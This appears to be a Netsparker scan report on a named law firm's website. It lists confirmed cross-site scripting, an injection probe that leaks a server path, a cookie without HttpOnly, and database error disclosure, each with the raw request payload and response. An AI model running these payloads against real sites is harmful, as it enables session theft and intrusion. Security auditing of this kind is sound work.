<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
</td>
<td width="48%" height="3">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Notice</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="386">
<tr>
<td width="52%" height="385" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<p style="line-height: 105%; margin-left:100px; margin-right:5px">
<font face="Verdana" style="font-size: 9pt">Y</font><font style="font-size: 8.5pt" face="Verdana">ou
understand and agree that transmitting information to Brown
Rudnick&nbsp;by e-mail does not establish an attorney-client
relationship. By clicking the &quot;Agree&quot; link below, you acknowledge
that (i) Brown Rudnick&nbsp;has no obligation to maintain the
confidentiality of any information you submit to Brown
Rudnick&nbsp;unless Brown Rudnick&nbsp;already represents you or Brown
Rudnick&nbsp;later agrees to represent you; thus, if you are not a
client, information you submit to Brown Rudnick&nbsp;by e-mail may be
disclosed to others and (ii) you have read and
understand the Brown Rudnick <a target="_blank" href="../terms.htm">
Terms of Use</a> and
<a target="_blank" href="../privacy.htm">Privacy Policy</a> and that you agree to be bound by
the terms and conditions of such
<a target="_blank" href="../terms.htm">Terms of Use</a> and
<a target="_blank" href="../privacy.htm">Privacy Policy</a>.</font></p>
<p style="line-height: 105%; margin-left:100px; margin-right:5px">
<font face="Verdana" style="font-size: 8.5pt">If you would like to
discuss becoming a client, please contact one of Brown Rudnick's
attorneys to arrange for a meeting or telephone conference. Thank
you for your interest in Brown Rudnick.</font></p>
<font size="2">
<div align="center">
<table id="table2" width="204">
<tbody>
<tr><td colspan=2 color=#000000 bgcolor=#ffff00><tt><b>Database Results Error</b><br><i>Description:</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '(ID = '"--></style></script><script>netsparker(0x00050A)</script>)'.<br><i>Number:</i> -2147217900 (0x80040E14)<br><i>Source:</i> Microsoft OLE DB Provider for ODBC Drivers<br></tt></td></tr></tbody>
</table></div>
</font>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber10" height="39">
<tr>
<td width="100%" height="39">
<form method="POST" action="../search/result.asp">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="689" id="AutoNumber12" height="49">
<tr>
<td width="100%" height="22">
<p style="line-height: 105%; margin-left: 100; margin-right: 5">
&nbsp;<p style="line-height: 105%; margin-left: 100; margin-right: 5">
<font face="Verdana" size="1"><a href="javascript:history.back()">
Previous Page</a></font><font face="Verdana" style="font-size: 8.5pt"><br>
<br>
&nbsp;</font></td>
</tr>
</table>

</td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table height="20" cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
</tbody>
</table>
</td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="385" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="385" bgcolor="#FFFFFF">
<p align="center" style="margin-left: 4">
&nbsp;</td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td>
</tr>
</table>

</td>
<td w..
- /glossary/glsryAlpha.asp

/glossary/glsryAlpha.asp CONFIRMED

http://www.brownrudnick.com/glossary/glsryAlpha.asp?Term='%22--%3E%3C/style%3E%3C/script%3E%3Cscript..

Parameters

Parameter Type Value
Term GET '"--></style></script><script>alert(0x000741)</script>

Request

GET /glossary/glsryAlpha.asp?Term='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000741)%3C/script%3E HTTP/1.1
Referer: http://www.brownrudnick.com/glossary/glossary.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:21:33 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 13669
Content-Type: text/html
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - A Glossary of Venture Capital &amp; IPO Terms - Search
Results</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg" width="758" height="18"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="navDefault"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../nr">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_self" href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../terms.htm">terms of use</a></font></td>
</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="../nr/images/booksTB.jpg"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
<p align="right" style="margin-right: 10"><b>
<font face="Verdana" size="1" color="#FFFFFF">news/resources</font></b></td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
<p class="class2" align="right"></td>
<td width="48%" height="3">
<font face="Verdana" size="1"><a href="../nr/alerts.asp">alerts &amp;
newsletters</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../nr/articles.asp">articles</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../nr/press.asp">press
releases</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../nr/pressArchv.asp">press release
archive</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../nr/publications.asp">publications</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="glossary.htm">glossary of VC &amp; IPO terms</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<a href="../blog/governmentcontracts/default.htm">
<font face="Verdana" size="1">blogs</font></a></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Glossary of VC &amp; IPO
Terms</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
<img border="0" src="../nr/images/n.jpg" width="46" height="31"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="211">
<tr>
<td width="43%" height="210" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber10">
<tr>
<td height="21" width="610">
<p style="margin-left: 100px">
<font size="2" face="Verdana">You searched for<b> &quot;'"--></style></script><script>netsparker(0x000741)</script>&quot;</b>:<br>
&nbsp;</font></td>
</tr>
<tr>
<td width="610" style="font-family: Verdana; font-size: 10pt" height="108">
<div align="left">
<table width="494">
<tbody>
<tr><td colspan=2 align="LEFT" width="100%">Sorry, there were no records that match the criteria that you entered</td></tr>
</tbody>
</table>
</div>
</td>
</tr>
<tr>
<td height="178" width="610">
<p style="margin-left: 10; margin-right: 10">&nbsp;<p style="margin-left: 10; margin-right: 10">&nbsp;<p style="margin-left: 10; margin-right: 10">
<b><font face="Verdana" size="1">
<a href="glossary.htm">SEARCH
FOR ANOTHER TERM</a></font></b><p style="margin-left: 10; margin-right: 10">&nbsp;<p style="margin-left: 10; margin-right: 10">&nbsp;<p style="margin-left: 10; margin-right: 10">&nbsp;<p style="margin-left: 10; margin-right: 10">&nbsp;</td>
</tr>
<tr>
<td width="100%">&nbsp;</td>
</tr>
</table>
</td>
<td width="27%" valign="top" height="210" class="SubLink" bgcolor="#FFFFFF">
<table border="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#111111" width="221" id="AutoNumber8" align="right">
<tr>
<td width="232" height="17" align="right" valign="top" style="border-right: 1px solid #F9CD30">
<p style="margin-right: 5" align="right">
<span style="font-weight: 700">
<font face="Verdana" style="font-size: 6.5pt">
<a href="../disc/cntcpubdisclaimer.asp?ID=3">Request Print Copy</a></font></span></td>
</tr>
<tr>
<td width="232" height="17" align="right" valign="top" style="border-right: 1px solid #F9CD30">
</td>
</tr>
<tr>
<td width="232" height="17" align="right" valign="top">
</td>
</tr>
<tr>
<td width="232" height="17" align="right">
</td>
</tr>
<tr>
<td width="232" height="17" align="right">
</td>
</tr>
<tr>
<td width="232" height="23" align="right"></td>
</tr>
<tr>
<td width="232" height="17" align="right">
</td>
</tr>
<tr>
<td width="232" height="17" align="right">
</td>
</tr>
</table>
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="210" bgcolor="#FFFFFF">
<p align="center">
<img border="0" src="../nr/images/ews_res.jpg" align="right" width="46" height="455"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height=&..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /search

/search CONFIRMED

http://www.brownrudnick.com/search?q=%0D%0Ans:netsparker056650=vuln&site=BRBI_DOM&client=BRBI_DOM&pr..

Parameters

Parameter Type Value
q GET ns:netsparker056650=vuln
site GET BRBI_DOM
client GET BRBI_DOM
proxystylesheet GET BRBI_DOM
output GET xml_no_dtd
I3 GET 3
restrict GET Brownrudnick_com

Request

GET /search?q=%0D%0Ans:netsparker056650=vuln&site=BRBI_DOM&client=BRBI_DOM&proxystylesheet=BRBI_DOM&output=xml_no_dtd&I3=3&restrict=Brownrudnick_com HTTP/1.1
Referer: http://www.brownrudnick.com/search/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Cookie: ASPSESSIONIDSSSASTRS=MNLLAMJAPBBHCECEJFBBEGFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:00:11 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close,Close
Content-Type: text/html; charset=UTF-8
Content-Length: 98


/export/hda3/5.0.2/local/conf/frontends/default_frontend/domain_filter (No such file or directory)
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /nr/articlesIndv.asp

/nr/articlesIndv.asp CONFIRMED

http://www.brownrudnick.com/nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/scr..

Identified Cookie

ASPSESSIONIDSSSASTRS

Request

GET /nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/script%3Eba5591b9a23 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:55:47 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11237
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSASTRS=KNLLAMJADLDCHBPJHLHOCAAF; path=/
Cache-control: private


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link rel="stylesheet" type="text/css" href="../firm.css">
</head>

<body topmargin="0" leftmargin="0" bgcolor="#4C4C4C" link="#FFD401" vlink="#FFD401" alink="#FFD401">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="590">
<tr>
<td width="73%" height="590">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="200" bgcolor="#FFFFFF">
<tr>
<td width="1046" colspan="3" height="8" bgcolor="#151515">
<img border="0" src="../images/tag4.jpg"></td>
</tr>
<tr>
<td width="111" rowspan="2" height="200" background="../images/nav3.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="107" id="AutoNumber9" height="43">
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#BF0018">
<a href="../">home</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../firm/">our firm</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../bio/">people</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../practice/">practices</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="navDefault"><font face="Verdana" size="1" color="#FFFFFF">
<a href="../nr">news/resources</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../event/">events</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_self" href="../career/">careers</a></font></td>
</tr>
<tr>
<td width="107" height="15">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a target="_blank" href="http://www.brownrudnickcenter.com">public
interest</a></font></td>
</tr>
<tr>
<td width="107" height="17">
<p align="center"><font face="Verdana" size="1" color="#FFD401">
<a href="../search/">search</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../contact.htm">contact us</a></font></td>
</tr>
<tr>
<td width="107" height="16">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../terms.htm">terms of use</a></font></td>
</tr>
<tr>
<td width="107" height="13">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../privacy.htm">privacy policy</a></font></td>
</tr>
<tr>
<td width="107" height="14">
<p align="center" class="SubGreyHover"><font face="Verdana" size="1">
<a href="../search/site.htm">site map</a></font></td>
</tr>
</table>
</td>
<td width="244" bgcolor="#616163" height="178" valign="top">
<img border="0" src="images/booksTB.jpg"></td>
<td width="758" rowspan="2" height="200" background="../images/sub1.jpg" valign="top">
<table border="0" cellpadding="0" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="96%" id="AutoNumber4" height="1" class="SubHover">
<tr>
<td width="52%" height="1">
<p align="right" style="margin-right: 10"><b>
<font face="Verdana" size="1" color="#FFFFFF">news/resources</font></b></td>
<td width="48%" height="1"></td>
</tr>
<tr>
<td width="52%" height="3">
<p class="class2" align="right"></td>
<td width="48%" height="3">
<font face="Verdana" size="1"><a href="alerts.asp">alerts &amp;
newsletters</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="articles.asp">articles</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="press.asp">press
releases</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="publications.asp">publications</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1"><a href="../glossary/glossary.htm">
glossary of VC &amp; IPO terms</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../blog/governmentcontracts/default.asp">blogs</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
<font face="Verdana" size="1">
<a href="../podcast/default.htm">podcasts</a></font></td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1"></td>
<td width="48%" height="1">
</td>
</tr>
<tr>
<td width="52%" height="1">
</td>
<td width="48%" height="1"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="244" height="23" valign="top">
<img border="0" src="../images/java3.jpg" width="244" height="23"></td>
</tr>
<tr>
<td width="1046" colspan="3" height="51">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="770" id="AutoNumber3" height="51">
<tr>
<td width="353" height="51">
<p style="margin-left: 100">
<b><font face="Verdana" size="2" color="#CF0000">Articles</font></b></td>
<td width="359" height="51" valign="top">
<img border="0" src="../images/sub2.jpg"></td>
<td width="58" height="51" valign="bottom">
<p align="center">
<img border="0" src="images/n.jpg" width="46" height="31"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="32" bgcolor="FFFFFF">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="99%" id="AutoNumber5" height="211">
<tr>
<td width="52%" height="210" valign="top" class="BodyHover" bgcolor="#FFFFFF">
<table width="576" height="85">
<tbody>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber11">
<tr>
<td width="100%">
<table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse" bordercolor="#111111">
<tbody>
<tr><td colspan=7 color=#000000 bgcolor=#ffff00><tt><b>Database Results Error</b><br><i>Description:</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 554f0bd0<script>alert(document.cookie)</script>ba5591b9a23)'.<br><i>Number:</i> -2147217900 (0x80040E14)<br><i>Source:</i> Microsoft OLE DB Provider for ODBC Drivers<br></tt></td></tr></tbody>
</table>
<p style="margin-left: 100; margin-right: 5">
<a href="javascript:history.go(-1)"><b>
<font face="Verdana" style="font-size: 8.5pt">� </font></b>
<font face="Verdana" style="font-size: 8.5pt">RETURN TO SEARCH RESULTS</font></a></td>
</tr>
</table>
</td>
<td width="12%" valign="top" height="210" class="SubLink" bgcolor="#FFFFFF">
<p align="right">&nbsp;</td>
<td width="5%" valign="top" height="210" bgcolor="#FFFFFF">
<p align="center">
<img border="0" src="images/ews_res.jpg" align="right" width="46" height="455"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#FFFFFF">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="table2" height="41" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="22" class="BodyHover" bgcolor="#FFFFFF" align="center">
<table border="0" width="182" cellspacing="0" cellpadding="0" id="table3" height="22">
<tr>
<td height="22"><a href="http://www.brownrudnick.com/rss/">
<img border="0" src="../images/rsswht.jpg" alt="Subscribe to Our RSS Feeds" width="17" height="17"></a></td>
<td width="158" class="BodyHover" height="22">
<font face="Verdana" size="1"><a href="../rss/">Subscribe to Our RSS
Feeds</a></font></td>
</tr>
</table></td>
</tr>
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#FFFFFF" align="center">
&nbsp;</td>
</tr>
</table>

</td>
</tr>
<tr>
<td width="1046" colspan="3" height="19" class="BodyHover" bgcolor="#000000">


<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="775" id="AutoNumber7" height="23" bgcolor="#FFFFFF">
<tr>
<td width="1046" height="19" class="BodyHover" bgcolor="#000000">
<p align="center">
<font face="Arial,Helvetica,Univers,Zurich BT" color="#999999" size="-2">
Copyright �
<SCRIPT LANGUAGE="JAVASCRIPT">

var d = new Date();
var curr_year = d.getFullYear();
document.write(curr_year);

</SCRIPT>

Brown Rudnick LLP. All Rights Reserved</font></td>
</tr>
</table>

</td>
</tr>
</table>

</td>
<td width="90%" height="590" valign="top">

<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="228">
<tr>
<td width="100%" height="10" bgcolor="#000000">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="33" bgcolor="#C8000A">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="166" bgcolor="#616163">&nbsp;</td>
</tr>
<tr>
<td width="100%" height="19" bgcolor="#4C4C4C">&nbsp;</td>
</tr>
</table>
<p align="right">
&nbsp;</td>
</tr>
</table>

</body>

</html>
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /nr/articlesIndv.asp

/nr/articlesIndv.asp

http://www.brownrudnick.com/nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/scr..

Request

GET /nr/articlesIndv.asp?ID=554f0bd0%3Cscript%3Ealert(document.cookie)%3C/script%3Eba5591b9a23 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.brownrudnick.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:55:50 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
